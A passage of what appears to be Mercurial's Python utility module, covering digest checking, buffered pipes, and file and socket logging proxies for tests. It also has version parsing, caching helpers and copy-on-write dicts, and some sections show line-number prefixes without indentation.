12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import collections
20 20 import contextlib
21 21 import errno
22 22 import gc
23 23 import hashlib
24 24 import itertools
25 25 import locale
26 26 import mmap
27 27 import os
28 28 import platform as pyplatform
29 29 import re as remod
30 30 import shutil
31 31 import socket
32 32 import stat
33 33 import sys
34 34 import time
35 35 import traceback
36 36 import warnings
37 37
38 38 from .thirdparty import attr
39 39 from .pycompat import (
40 40 delattr,
41 41 getattr,
42 42 open,
43 43 setattr,
44 44 )
45 45 from hgdemandimport import tracing
46 46 from . import (
47 47 encoding,
48 48 error,
49 49 i18n,
50 50 node as nodemod,
51 51 policy,
52 52 pycompat,
53 53 urllibcompat,
54 54 )
55 55 from .utils import (
56 56 compression,
57 57 hashutil,
58 58 procutil,
59 59 stringutil,
60 60 )
61 61
62 62 base85 = policy.importmod('base85')
63 63 osutil = policy.importmod('osutil')
64 64
65 65 b85decode = base85.b85decode
66 66 b85encode = base85.b85encode
67 67
68 68 cookielib = pycompat.cookielib
69 69 httplib = pycompat.httplib
70 70 pickle = pycompat.pickle
71 71 safehasattr = pycompat.safehasattr
72 72 socketserver = pycompat.socketserver
73 73 bytesio = pycompat.bytesio
74 74 # TODO deprecate stringio name, as it is a lie on Python 3.
75 75 stringio = bytesio
76 76 xmlrpclib = pycompat.xmlrpclib
77 77
78 78 httpserver = urllibcompat.httpserver
79 79 urlerr = urllibcompat.urlerr
80 80 urlreq = urllibcompat.urlreq
81 81
82 82 # workaround for win32mbcs
83 83 _filenamebytestr = pycompat.bytestr
84 84
85 85 if pycompat.iswindows:
86 86 from . import windows as platform
87 87 else:
88 88 from . import posix as platform
89 89
90 90 _ = i18n._
91 91
92 92 bindunixsocket = platform.bindunixsocket
93 93 cachestat = platform.cachestat
94 94 checkexec = platform.checkexec
95 95 checklink = platform.checklink
96 96 copymode = platform.copymode
97 97 expandglobs = platform.expandglobs
98 98 getfsmountpoint = platform.getfsmountpoint
99 99 getfstype = platform.getfstype
100 100 groupmembers = platform.groupmembers
101 101 groupname = platform.groupname
102 102 isexec = platform.isexec
103 103 isowner = platform.isowner
104 104 listdir = osutil.listdir
105 105 localpath = platform.localpath
106 106 lookupreg = platform.lookupreg
107 107 makedir = platform.makedir
108 108 nlinks = platform.nlinks
109 109 normpath = platform.normpath
110 110 normcase = platform.normcase
111 111 normcasespec = platform.normcasespec
112 112 normcasefallback = platform.normcasefallback
113 113 openhardlinks = platform.openhardlinks
114 114 oslink = platform.oslink
115 115 parsepatchoutput = platform.parsepatchoutput
116 116 pconvert = platform.pconvert
117 117 poll = platform.poll
118 118 posixfile = platform.posixfile
119 119 readlink = platform.readlink
120 120 rename = platform.rename
121 121 removedirs = platform.removedirs
122 122 samedevice = platform.samedevice
123 123 samefile = platform.samefile
124 124 samestat = platform.samestat
125 125 setflags = platform.setflags
126 126 split = platform.split
127 127 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
128 128 statisexec = platform.statisexec
129 129 statislink = platform.statislink
130 130 umask = platform.umask
131 131 unlink = platform.unlink
132 132 username = platform.username
133 133
134 134
def setumask(val):
    """Update the process umask; used by the chg server.

    No-op on Windows, which has no umask concept.
    """
    if pycompat.iswindows:
        return
    os.umask(val)
    global umask
    umask = val & 0o777
    # keep the platform module's cached copy in sync
    platform.umask = umask
142 142
143 143
144 144 # small compat layer
145 145 compengines = compression.compengines
146 146 SERVERROLE = compression.SERVERROLE
147 147 CLIENTROLE = compression.CLIENTROLE
148 148
149 149 try:
150 150 recvfds = osutil.recvfds
151 151 except AttributeError:
152 152 pass
153 153
154 154 # Python compatibility
155 155
156 156 _notset = object()
157 157
158 158
def bitsfrom(container):
    """Return the bitwise OR of all values in ``container``."""
    combined = 0
    for flag in container:
        combined |= flag
    return combined
164 164
165 165
# python 2.6 still has deprecation warnings enabled by default.  We do not
# want to display anything to regular users, so python deprecation warnings
# are only emitted while running the test suite.
_dowarn = bool(encoding.environ.get(b'HGEMITWARNINGS'))
if _dowarn:
    # Explicitly unfilter our warnings for python 2.7.
    #
    # Setting PYTHONWARNINGS in the test runner was investigated, but module
    # names passed through PYTHONWARNINGS are matched exactly, so 'mercurial'
    # would not cover e.g. 'mercurial.scmutil' — useless for our case.
    for _warnmodule in ('mercurial', 'hgext', 'hgext3rd'):
        warnings.filterwarnings('default', '', DeprecationWarning, _warnmodule)
if _dowarn and pycompat.ispy3:
    # silence warning emitted by passing user string to re.sub()
    warnings.filterwarnings(
        'ignore', 'bad escape', DeprecationWarning, 'mercurial'
    )
    warnings.filterwarnings(
        'ignore', 'invalid escape sequence', DeprecationWarning, 'mercurial'
    )
    # TODO: reinvent imp.is_frozen()
    warnings.filterwarnings(
        'ignore',
        'the imp module is deprecated',
        DeprecationWarning,
        'mercurial',
    )
195 195
196 196
def nouideprecwarn(msg, version, stacklevel=1):
    """Issue a python native deprecation warning.

    This is a noop outside of tests; use 'ui.deprecwarn' when possible.
    """
    if not _dowarn:
        return
    suffix = (
        b"\n(compatibility will be dropped after Mercurial-%s,"
        b" update your code.)"
    ) % version
    warnings.warn(
        pycompat.sysstr(msg + suffix), DeprecationWarning, stacklevel + 1
    )
    # on python 3 with chg, we will need to explicitly flush the output
    sys.stderr.flush()
210 210
211 211
# Known digest algorithms: name -> hasher constructor.
DIGESTS = {
    b'md5': hashlib.md5,
    b'sha1': hashutil.sha1,
    b'sha512': hashlib.sha512,
}
# Digest types ordered from strongest to weakest.
DIGESTS_BY_STRENGTH = [b'sha512', b'sha1', b'md5']

# Sanity check: every preference entry must refer to a known digest.
for k in DIGESTS_BY_STRENGTH:
    assert k in DIGESTS
222 222
223 223
class digester(object):
    """helper to compute digests.

    This helper can be used to compute one or more digests given their name.

    >>> d = digester([b'md5', b'sha1'])
    >>> d.update(b'foo')
    >>> [k for k in sorted(d)]
    ['md5', 'sha1']
    >>> d[b'md5']
    'acbd18db4cc2f85cedef654fccc4a4d8'
    >>> d[b'sha1']
    '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
    >>> digester.preferred([b'md5', b'sha1'])
    'sha1'
    """

    def __init__(self, digests, s=b''):
        """Create a hasher for each name in ``digests``; feed ``s`` if given.

        Raises ``error.Abort`` for unknown digest names.
        """
        self._hashes = {}
        for k in digests:
            if k not in DIGESTS:
                raise error.Abort(_(b'unknown digest type: %s') % k)
            self._hashes[k] = DIGESTS[k]()
        if s:
            self.update(s)

    def update(self, data):
        """Feed ``data`` to every underlying hasher."""
        for h in self._hashes.values():
            h.update(data)

    def __getitem__(self, key):
        """Return the hex digest computed so far for digest type ``key``."""
        if key not in DIGESTS:
            # Fix: the error message previously interpolated the stale
            # module-level loop variable 'k' instead of the requested 'key',
            # producing a misleading (or unbound) name in the message.
            raise error.Abort(_(b'unknown digest type: %s') % key)
        return nodemod.hex(self._hashes[key].digest())

    def __iter__(self):
        return iter(self._hashes)

    @staticmethod
    def preferred(supported):
        """returns the strongest digest type in both supported and DIGESTS."""

        for k in DIGESTS_BY_STRENGTH:
            if k in supported:
                return k
        return None
270 270
271 271
class digestchecker(object):
    """file handle wrapper that additionally checks content against a given
    size and digests.

    d = digestchecker(fh, size, {'md5': '...'})

    When multiple digests are given, all of them are validated.
    """

    def __init__(self, fh, size, digests):
        self._fh = fh
        self._size = size
        self._got = 0
        self._digests = dict(digests)
        self._digester = digester(self._digests.keys())

    def read(self, length=-1):
        """Read from the wrapped handle while accumulating size/digests."""
        data = self._fh.read(length)
        self._digester.update(data)
        self._got += len(data)
        return data

    def validate(self):
        """Abort when the byte count or any digest does not match."""
        if self._got != self._size:
            raise error.Abort(
                _(b'size mismatch: expected %d, got %d')
                % (self._size, self._got)
            )
        for name, expected in self._digests.items():
            actual = self._digester[name]
            if expected != actual:
                # i18n: first parameter is a digest name
                raise error.Abort(
                    _(b'%s mismatch: expected %s, got %s')
                    % (name, expected, actual)
                )
307 307
308 308
309 309 try:
310 310 buffer = buffer
311 311 except NameError:
312 312
313 313 def buffer(sliceable, offset=0, length=None):
314 314 if length is not None:
315 315 return memoryview(sliceable)[offset : offset + length]
316 316 return memoryview(sliceable)[offset:]
317 317
318 318
319 319 _chunksize = 4096
320 320
321 321
class bufferedinputpipe(object):
    """a manually buffered input pipe

    Python will not let us use buffered IO and lazy reading with 'polling' at
    the same time: the buffer state cannot be probed, and select will not see
    data that is already buffered.

    This class works around that by doing its own buffering (allowing an
    efficient readline) while exposing whether the buffer holds data, so the
    buffer can collaborate with polling.

    It lives in 'util' because it relies on the stdlib 'os' module.
    """

    def __new__(cls, fh):
        # A fileobjectproxy input needs the observer-aware variant of this
        # class so that low-level reads are reported too.
        if isinstance(fh, fileobjectproxy):
            cls = observedbufferedinputpipe

        return super(bufferedinputpipe, cls).__new__(cls)

    def __init__(self, input):
        self._input = input
        self._buffer = []       # list of buffered byte chunks
        self._eof = False       # set once the underlying fd hits EOF
        self._lenbuf = 0        # total bytes currently buffered

    @property
    def hasbuffer(self):
        """True if any data is currently buffered.

        Used externally as a pre-step for polling IO: when data is already
        buffered, no polling should be set up.
        """
        return bool(self._buffer)

    @property
    def closed(self):
        return self._input.closed

    def fileno(self):
        return self._input.fileno()

    def close(self):
        return self._input.close()

    def read(self, size):
        """Return up to ``size`` bytes, reading more as needed."""
        while not self._eof and self._lenbuf < size:
            self._fillbuffer()
        return self._frombuffer(size)

    def unbufferedread(self, size):
        """Return whatever is available without waiting for ``size`` bytes."""
        if not self._eof and self._lenbuf == 0:
            self._fillbuffer(max(size, _chunksize))
        return self._frombuffer(min(self._lenbuf, size))

    def readline(self, *args, **kwargs):
        if len(self._buffer) > 1:
            # Should not happen: both read and readline end with a
            # _frombuffer call that collapses the buffer to one chunk.
            self._buffer = [b''.join(self._buffer)]
            self._lenbuf = len(self._buffer[0])
        nlpos = -1
        if self._buffer:
            nlpos = self._buffer[-1].find(b'\n')
        while not self._eof and nlpos < 0:
            self._fillbuffer()
            if self._buffer:
                nlpos = self._buffer[-1].find(b'\n')
        consume = nlpos + 1
        if nlpos < 0:  # end of file: hand back everything buffered
            consume = self._lenbuf
        elif len(self._buffer) > 1:
            # account for the chunks preceding the last one
            consume += self._lenbuf - len(self._buffer[-1])
        return self._frombuffer(consume)

    def _frombuffer(self, size):
        """return at most 'size' data from the buffer

        The data are removed from the buffer."""
        if size == 0 or not self._buffer:
            return b''
        joined = self._buffer[0]
        if len(self._buffer) > 1:
            joined = b''.join(self._buffer)

        data = joined[:size]
        remainder = joined[len(data) :]
        if remainder:
            self._buffer = [remainder]
            self._lenbuf = len(remainder)
        else:
            self._buffer = []
            self._lenbuf = 0
        return data

    def _fillbuffer(self, size=_chunksize):
        """read data to the buffer"""
        data = os.read(self._input.fileno(), size)
        if not data:
            self._eof = True
        else:
            self._lenbuf += len(data)
            self._buffer.append(data)

        return data
430 430
431 431
def mmapread(fp, size=None):
    """Memory-map ``fp`` and return a read-only buffer over its contents.

    ``size`` of None maps the whole file; a size of 0 yields ``b''``.
    """
    if size == 0:
        # mmap.mmap() interprets a length of 0 as "map everything", so a
        # request for zero bytes has to be special-cased.
        return b''
    if size is None:
        size = 0
    try:
        fd = getattr(fp, 'fileno', lambda: fp)()
        return mmap.mmap(fd, size, access=mmap.ACCESS_READ)
    except ValueError:
        # Empty files cannot be mmapped, but mmapread should still work:
        # return an empty buffer for them.
        if os.fstat(fd).st_size == 0:
            return b''
        raise
448 448
449 449
# Attribute names that fileobjectproxy resolves on itself: the observed
# methods plus its observer.  Everything else goes to the wrapped file.
_FILEOBJECT_PROXIED = {
    '_observer',
    # IOBase
    'close',
    # 'closed' is a property and is delegated
    'fileno',
    'flush',
    'isatty',
    'readable',
    'readline',
    'readlines',
    'seek',
    'seekable',
    'tell',
    'truncate',
    'writable',
    'writelines',
    # RawIOBase
    'read',
    'readall',
    'readinto',
    'write',
    # BufferedIOBase ('raw' is a property; read/readinto/write are above)
    'detach',
    'read1',
}


class fileobjectproxy(object):
    """A proxy around file objects that tells a watcher when events occur.

    This type is intended to only be used for testing purposes. Think hard
    before using it in important code.
    """

    __slots__ = (
        '_orig',
        '_observer',
    )

    def __init__(self, fh, observer):
        object.__setattr__(self, '_orig', fh)
        object.__setattr__(self, '_observer', observer)

    def __getattribute__(self, name):
        # Only a fixed set of methods is observed; all other attributes are
        # resolved directly on the wrapped file object.
        if name in _FILEOBJECT_PROXIED:
            return object.__getattribute__(self, name)

        return getattr(object.__getattribute__(self, '_orig'), name)

    def __nonzero__(self):
        return bool(object.__getattribute__(self, '_orig'))

    __bool__ = __nonzero__

    def __delattr__(self, name):
        return delattr(object.__getattribute__(self, '_orig'), name)

    def __setattr__(self, name, value):
        return setattr(object.__getattribute__(self, '_orig'), name, value)

    def __iter__(self):
        return object.__getattribute__(self, '_orig').__iter__()

    def _observedcall(self, name, *args, **kwargs):
        # Call the real method first, then give the observer a chance to
        # react/log by invoking its hook of the same name (if any).
        orig = object.__getattribute__(self, '_orig')
        res = getattr(orig, name)(*args, **kwargs)

        observer = object.__getattribute__(self, '_observer')
        fn = getattr(observer, name, None)
        if fn:
            fn(res, *args, **kwargs)

        return res


def _makefileproxymethod(name):
    """Build a fileobjectproxy method that routes through _observedcall."""

    def proxymethod(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            name, *args, **kwargs
        )

    proxymethod.__name__ = name
    return proxymethod


# Generate the observed delegating methods instead of spelling out ~20
# identical bodies by hand.
for _fomethod in sorted(_FILEOBJECT_PROXIED - {'_observer'}):
    setattr(fileobjectproxy, _fomethod, _makefileproxymethod(_fomethod))
627 627
class observedbufferedinputpipe(bufferedinputpipe):
    """A variation of bufferedinputpipe that is aware of fileobjectproxy.

    ``bufferedinputpipe`` performs low-level ``os.read()`` calls that bypass
    ``fileobjectproxy``, so this subclass notifies observers about those
    reads itself and also re-publishes ``read()`` and ``readline()`` events.
    """

    def _fillbuffer(self):
        data = super(observedbufferedinputpipe, self)._fillbuffer()

        hook = getattr(self._input._observer, 'osread', None)
        if hook:
            hook(data, _chunksize)

        return data

    # Different observer methods are used because these operations happen
    # on this object, not on the underlying file object.
    def read(self, size):
        data = super(observedbufferedinputpipe, self).read(size)

        hook = getattr(self._input._observer, 'bufferedread', None)
        if hook:
            hook(data, size)

        return data

    def readline(self, *args, **kwargs):
        data = super(observedbufferedinputpipe, self).readline(*args, **kwargs)

        hook = getattr(self._input._observer, 'bufferedreadline', None)
        if hook:
            hook(data)

        return data
668 668
669 669
# Socket methods whose invocations socketproxy reports to its observer;
# everything else is delegated directly to the wrapped socket.
PROXIED_SOCKET_METHODS = {
    'gettimeout',
    'makefile',
    'recv',
    'recv_into',
    'recvfrom',
    'recvfrom_into',
    'send',
    'sendall',
    'sendto',
    'setblocking',
    'setsockopt',
    'settimeout',
}
684 684
685 685
class socketproxy(object):
    """A proxy around a socket that tells a watcher when events occur.

    This is like ``fileobjectproxy`` except for sockets.

    This type is intended to only be used for testing purposes. Think hard
    before using it in important code.
    """

    __slots__ = (
        '_orig',
        '_observer',
    )

    # Methods whose calls are reported to the observer.  Kept as a class
    # attribute so __getattribute__ does not depend on module globals.
    _observedmethods = frozenset(
        [
            'makefile',
            'recv',
            'recvfrom',
            'recvfrom_into',
            'recv_into',
            'send',
            'sendall',
            'sendto',
            'setblocking',
            'settimeout',
            'gettimeout',
            'setsockopt',
        ]
    )

    def __init__(self, sock, observer):
        object.__setattr__(self, '_orig', sock)
        object.__setattr__(self, '_observer', observer)

    def __getattribute__(self, name):
        # Observed methods live on the proxy; every other attribute is
        # resolved directly on the wrapped socket.
        if name in socketproxy._observedmethods:
            return object.__getattribute__(self, name)

        return getattr(object.__getattribute__(self, '_orig'), name)

    def __delattr__(self, name):
        return delattr(object.__getattribute__(self, '_orig'), name)

    def __setattr__(self, name, value):
        return setattr(object.__getattribute__(self, '_orig'), name, value)

    def __nonzero__(self):
        return bool(object.__getattribute__(self, '_orig'))

    __bool__ = __nonzero__

    def _observedcall(self, name, *args, **kwargs):
        # Call the real method first, then give the observer a chance to
        # react/log by invoking its hook of the same name (if any).
        orig = object.__getattribute__(self, '_orig')
        res = getattr(orig, name)(*args, **kwargs)

        observer = object.__getattribute__(self, '_observer')
        fn = getattr(observer, name, None)
        if fn:
            fn(res, *args, **kwargs)

        return res

    def makefile(self, *args, **kwargs):
        res = object.__getattribute__(self, '_observedcall')(
            'makefile', *args, **kwargs
        )

        # The returned file object may be used for I/O, so wrap it in a
        # logging proxy driven by the same observer.
        observer = object.__getattribute__(self, '_observer')
        return makeloggingfileobject(
            observer.fh,
            res,
            observer.name,
            reads=observer.reads,
            writes=observer.writes,
            logdata=observer.logdata,
            logdataapis=observer.logdataapis,
        )


def _makesocketproxymethod(name):
    """Build a socketproxy method that routes through _observedcall."""

    def proxymethod(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            name, *args, **kwargs
        )

    proxymethod.__name__ = name
    return proxymethod


# Generate the observed delegating methods from the method names.  This
# also fixes a bug in the previous hand-written versions: recv_into()
# forwarded to the misspelled name 'recv_info', so every call raised
# AttributeError on the wrapped socket.
for _sockmethod in (
    'recv',
    'recvfrom',
    'recvfrom_into',
    'recv_into',
    'send',
    'sendall',
    'sendto',
    'setblocking',
    'settimeout',
    'gettimeout',
    'setsockopt',
):
    setattr(socketproxy, _sockmethod, _makesocketproxymethod(_sockmethod))
808 808
class baseproxyobserver(object):
    """Shared state and data-formatting helper for I/O observers.

    ``fh`` is the file object the log is written to; ``name`` prefixes
    each logged line. ``logdata`` controls whether payload bytes are
    logged at all; ``logdataapis`` controls whether the API-call line
    itself is being emitted (which changes how payloads are appended).
    """

    def __init__(self, fh, name, logdata, logdataapis):
        self.fh = fh
        self.name = name
        self.logdata = logdata
        self.logdataapis = logdataapis

    def _writedata(self, data):
        """Append the payload of an observed call to the log handle."""
        if not self.logdata:
            # Payload logging disabled; just terminate the API line.
            if self.logdataapis:
                self.fh.write(b'\n')
                self.fh.flush()
            return

        if b'\n' in data:
            # Data containing newlines is written across multiple lines.
            if self.logdataapis:
                self.fh.write(b':\n')

            for piece in data.splitlines(True):
                self.fh.write(
                    b'%s> %s\n' % (self.name, stringutil.escapestr(piece))
                )
            self.fh.flush()
            return

        # Simple case: all data fits on a single line.
        if self.logdataapis:
            self.fh.write(b': %s\n' % stringutil.escapestr(data))
        else:
            self.fh.write(
                b'%s> %s\n' % (self.name, stringutil.escapestr(data))
            )
        self.fh.flush()
844 844
845 845
class fileobjectobserver(baseproxyobserver):
    """Logs file object activity.

    Each method is invoked by the proxy's _observedcall with the observed
    call's return value as the first argument (``res``), followed by the
    original call's arguments. The log line format is byte-exact and
    consumed by tests, so it must not change.
    """

    def __init__(
        self, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
    ):
        super(fileobjectobserver, self).__init__(fh, name, logdata, logdataapis)
        # Per-direction switches: when False, the corresponding hooks
        # return early and log nothing.
        self.reads = reads
        self.writes = writes

    def read(self, res, size=-1):
        if not self.reads:
            return
        # Python 3 can return None from reads at EOF instead of empty strings.
        if res is None:
            res = b''

        if size == -1 and res == b'':
            # Suppress pointless read(-1) calls that return
            # nothing. These happen _a lot_ on Python 3, and there
            # doesn't seem to be a better workaround to have matching
            # Python 2 and 3 behavior. :(
            return

        if self.logdataapis:
            self.fh.write(b'%s> read(%d) -> %d' % (self.name, size, len(res)))

        self._writedata(res)

    def readline(self, res, limit=-1):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write(b'%s> readline() -> %d' % (self.name, len(res)))

        self._writedata(res)

    def readinto(self, res, dest):
        # res is the number of bytes read into dest (may be None).
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write(
                b'%s> readinto(%d) -> %r' % (self.name, len(dest), res)
            )

        data = dest[0:res] if res is not None else b''

        # _writedata() uses "in" operator and is confused by memoryview because
        # characters are ints on Python 3.
        if isinstance(data, memoryview):
            data = data.tobytes()

        self._writedata(data)

    def write(self, res, data):
        if not self.writes:
            return

        # Python 2 returns None from some write() calls. Python 3 (reasonably)
        # returns the integer bytes written.
        if res is None and data:
            res = len(data)

        if self.logdataapis:
            self.fh.write(b'%s> write(%d) -> %r' % (self.name, len(data), res))

        self._writedata(data)

    def flush(self, res):
        if not self.writes:
            return

        self.fh.write(b'%s> flush() -> %r\n' % (self.name, res))

    # For observedbufferedinputpipe.
    def bufferedread(self, res, size):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write(
                b'%s> bufferedread(%d) -> %d' % (self.name, size, len(res))
            )

        self._writedata(res)

    def bufferedreadline(self, res):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write(
                b'%s> bufferedreadline() -> %d' % (self.name, len(res))
            )

        self._writedata(res)
944 944
945 945
def makeloggingfileobject(
    logh, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
):
    """Turn a file object into a logging file object.

    ``logh`` receives the log output; ``fh`` is the file object being
    observed. The remaining flags are forwarded to fileobjectobserver.
    """
    return fileobjectproxy(
        fh,
        fileobjectobserver(
            logh,
            name,
            reads=reads,
            writes=writes,
            logdata=logdata,
            logdataapis=logdataapis,
        ),
    )
960 960
961 961
class socketobserver(baseproxyobserver):
    """Logs socket activity.

    Each method is invoked by the proxy's _observedcall with the observed
    call's return value as the first argument (``res``), followed by the
    original call's arguments.
    """

    def __init__(
        self,
        fh,
        name,
        reads=True,
        writes=True,
        states=True,
        logdata=False,
        logdataapis=True,
    ):
        super(socketobserver, self).__init__(fh, name, logdata, logdataapis)
        # Per-category switches: reads/writes gate data transfer logging,
        # states gates socket configuration calls (timeouts, blocking, ...).
        self.reads = reads
        self.writes = writes
        self.states = states

    def makefile(self, res, mode=None, bufsize=None):
        if not self.states:
            return

        self.fh.write(b'%s> makefile(%r, %r)\n' % (self.name, mode, bufsize))

    def recv(self, res, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write(
                b'%s> recv(%d, %d) -> %d' % (self.name, size, flags, len(res))
            )
        self._writedata(res)

    def recvfrom(self, res, size, flags=0):
        # res is a (data, address) tuple; only the data is logged.
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write(
                b'%s> recvfrom(%d, %d) -> %d'
                % (self.name, size, flags, len(res[0]))
            )

        self._writedata(res[0])

    def recvfrom_into(self, res, buf, size, flags=0):
        # res is a (nbytes, address) tuple; buf holds the received data.
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write(
                b'%s> recvfrom_into(%d, %d) -> %d'
                % (self.name, size, flags, res[0])
            )

        self._writedata(buf[0 : res[0]])

    def recv_into(self, res, buf, size=0, flags=0):
        # res is the number of bytes received into buf.
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write(
                b'%s> recv_into(%d, %d) -> %d' % (self.name, size, flags, res)
            )

        self._writedata(buf[0:res])

    def send(self, res, data, flags=0):
        if not self.writes:
            return

        if self.logdataapis:
            # Fixed: socket.send() returns the number of bytes sent (an
            # int), so the previous len(res) raised TypeError whenever an
            # observed send() was logged. Also added the logdataapis guard
            # for consistency with recv()/sendall()/sendto().
            self.fh.write(
                b'%s> send(%d, %d) -> %d' % (self.name, len(data), flags, res)
            )
        self._writedata(data)

    def sendall(self, res, data, flags=0):
        if not self.writes:
            return

        if self.logdataapis:
            # Returns None on success. So don't bother reporting return value.
            self.fh.write(
                b'%s> sendall(%d, %d)' % (self.name, len(data), flags)
            )

        self._writedata(data)

    def sendto(self, res, data, flagsoraddress, address=None):
        if not self.writes:
            return

        # sendto() has two signatures: (data, address) and
        # (data, flags, address); disambiguate from the argument count.
        if address:
            flags = flagsoraddress
        else:
            flags = 0

        if self.logdataapis:
            self.fh.write(
                b'%s> sendto(%d, %d, %r) -> %d'
                % (self.name, len(data), flags, address, res)
            )

        self._writedata(data)

    def setblocking(self, res, flag):
        if not self.states:
            return

        self.fh.write(b'%s> setblocking(%r)\n' % (self.name, flag))

    def settimeout(self, res, value):
        if not self.states:
            return

        self.fh.write(b'%s> settimeout(%r)\n' % (self.name, value))

    def gettimeout(self, res):
        if not self.states:
            return

        self.fh.write(b'%s> gettimeout() -> %f\n' % (self.name, res))

    def setsockopt(self, res, level, optname, value):
        if not self.states:
            return

        self.fh.write(
            b'%s> setsockopt(%r, %r, %r) -> %r\n'
            % (self.name, level, optname, value, res)
        )
1095 1095
1096 1096
def makeloggingsocket(
    logh,
    fh,
    name,
    reads=True,
    writes=True,
    states=True,
    logdata=False,
    logdataapis=True,
):
    """Turn a socket into a logging socket.

    ``logh`` receives the log output; ``fh`` is the socket being observed.
    The remaining flags are forwarded to socketobserver.
    """
    return socketproxy(
        fh,
        socketobserver(
            logh,
            name,
            reads=reads,
            writes=writes,
            states=states,
            logdata=logdata,
            logdataapis=logdataapis,
        ),
    )
1119 1119
1120 1120
def version():
    """Return version information if available, b'unknown' otherwise.

    The __version__ module is generated at build time, so a raw source
    checkout may not have it — hence the ImportError fallback.
    """
    try:
        from . import __version__
    except ImportError:
        return b'unknown'
    return __version__.version
1129 1129
1130 1130
def versiontuple(v=None, n=4):
    """Parses a Mercurial version string into an N-tuple.

    The version string to be parsed is specified with the ``v`` argument.
    If it isn't defined, the current Mercurial version string will be parsed.

    ``n`` can be 2, 3, or 4. Here is how some version strings map to
    returned values:

    >>> v = b'3.6.1+190-df9b73d2d444'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, 1)
    >>> versiontuple(v, 4)
    (3, 6, 1, '190-df9b73d2d444')

    >>> versiontuple(b'3.6', 4)
    (3, 6, None, None)
    >>> versiontuple(b'3.9-rc', 4)
    (3, 9, None, 'rc')
    >>> versiontuple(b'4.6rc0')
    (4, 6, None, 'rc0')
    >>> versiontuple(b'.1.2.3')
    (None, None, None, '.1.2.3')
    >>> versiontuple(b'12.34..5')
    (12, 34, None, '..5')
    >>> versiontuple(b'1.2.3.4.5.6')
    (1, 2, 3, '.4.5.6')
    """
    if not v:
        v = version()
    m = remod.match(br'(\d+(?:\.\d+){,2})[+-]?(.*)', v)
    if not m:
        # No leading digits at all: everything is "extra".
        vparts, extra = b'', v
    elif m.group(2):
        vparts, extra = m.groups()
    else:
        vparts, extra = m.group(1), None

    assert vparts is not None  # help pytype

    numparts = []
    for piece in vparts.split(b'.'):
        if not piece.isdigit():
            # Stop at the first non-numeric component (e.g. the empty
            # string produced by splitting b'').
            break
        numparts.append(int(piece))
    # Pad to at least three components: (3, 6) -> (3, 6, None).
    numparts.extend([None] * (3 - len(numparts)))

    if n == 2:
        return (numparts[0], numparts[1])
    if n == 3:
        return (numparts[0], numparts[1], numparts[2])
    if n == 4:
        return (numparts[0], numparts[1], numparts[2], extra)
1214 1214
1215 1215
def cachefunc(func):
    '''cache the result of function calls'''
    # XXX doesn't handle keywords args
    argcount = func.__code__.co_argcount

    if argcount == 0:
        # Zero-argument functions are memoized with a one-slot list.
        holder = []

        def f():
            if not holder:
                holder.append(func())
            return holder[0]

        return f

    cache = {}
    if argcount == 1:
        # Single-argument fast path: key on the argument directly instead
        # of packing/unpacking a tuple.
        def f(arg):
            if arg not in cache:
                cache[arg] = func(arg)
            return cache[arg]

    else:

        def f(*args):
            if args not in cache:
                cache[args] = func(*args)
            return cache[args]

    return f
1245 1245
1246 1246
class cow(object):
    """helper class to make copy-on-write easier

    Call preparewrite before doing any writes.
    """

    def preparewrite(self):
        """call this before writes, return self or a copied new object"""
        pending = getattr(self, '_copied', 0)
        if pending:
            # Someone holds a cheap copy: pay for a real copy now and
            # leave the shared object for the remaining holders.
            self._copied = pending - 1
            return self.__class__(self)
        return self

    def copy(self):
        """always do a cheap copy"""
        self._copied = getattr(self, '_copied', 0) + 1
        return self
1264 1264
1265 1265
class sortdict(collections.OrderedDict):
    '''a simple sorted dictionary

    >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
    >>> d2 = d1.copy()
    >>> d2
    sortdict([('a', 0), ('b', 1)])
    >>> d2.update([(b'a', 2)])
    >>> list(d2.keys()) # should still be in last-set order
    ['b', 'a']
    >>> d1.insert(1, b'a.5', 0.5)
    >>> d1
    sortdict([('a', 0), ('a.5', 0.5), ('b', 1)])
    '''

    def __setitem__(self, key, value):
        # Re-setting an existing key moves it to the end (last-set order).
        if key in self:
            del self[key]
        super(sortdict, self).__setitem__(key, value)

    if pycompat.ispypy:
        # __setitem__() isn't called as of PyPy 5.8.0
        def update(self, src):
            if isinstance(src, dict):
                src = pycompat.iteritems(src)
            for k, v in src:
                self[k] = v

    def insert(self, position, key, value):
        snapshot = list(self.items())
        for idx, (k, v) in enumerate(snapshot):
            if idx == position:
                self[key] = value
            if idx >= position:
                # Re-append existing entries so they land after the
                # freshly inserted key.
                del self[k]
                self[k] = v
1301 1301
1302 1302
class cowdict(cow, dict):
    """copy-on-write dict

    Be sure to call d = d.preparewrite() before writing to d.

    >>> a = cowdict()
    >>> a is a.preparewrite()
    True
    >>> b = a.copy()
    >>> b is a
    True
    >>> c = b.copy()
    >>> c is a
    True
    >>> a = a.preparewrite()
    >>> b is a
    False
    >>> a is a.preparewrite()
    True
    >>> c = c.preparewrite()
    >>> b is c
    False
    >>> b is b.preparewrite()
    True
    """
1329 1329
class cowsortdict(cow, sortdict):
    """copy-on-write sortdict

    Be sure to call d = d.preparewrite() before writing to d.
    """
1335 1335
1336 1336
class transactional(object):  # pytype: disable=ignored-metaclass
    """Base class for making a transactional type into a context manager."""

    __metaclass__ = abc.ABCMeta

    @abc.abstractmethod
    def close(self):
        """Successfully closes the transaction."""

    @abc.abstractmethod
    def release(self):
        """Marks the end of the transaction.

        If the transaction has not been closed, it will be aborted.
        """

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
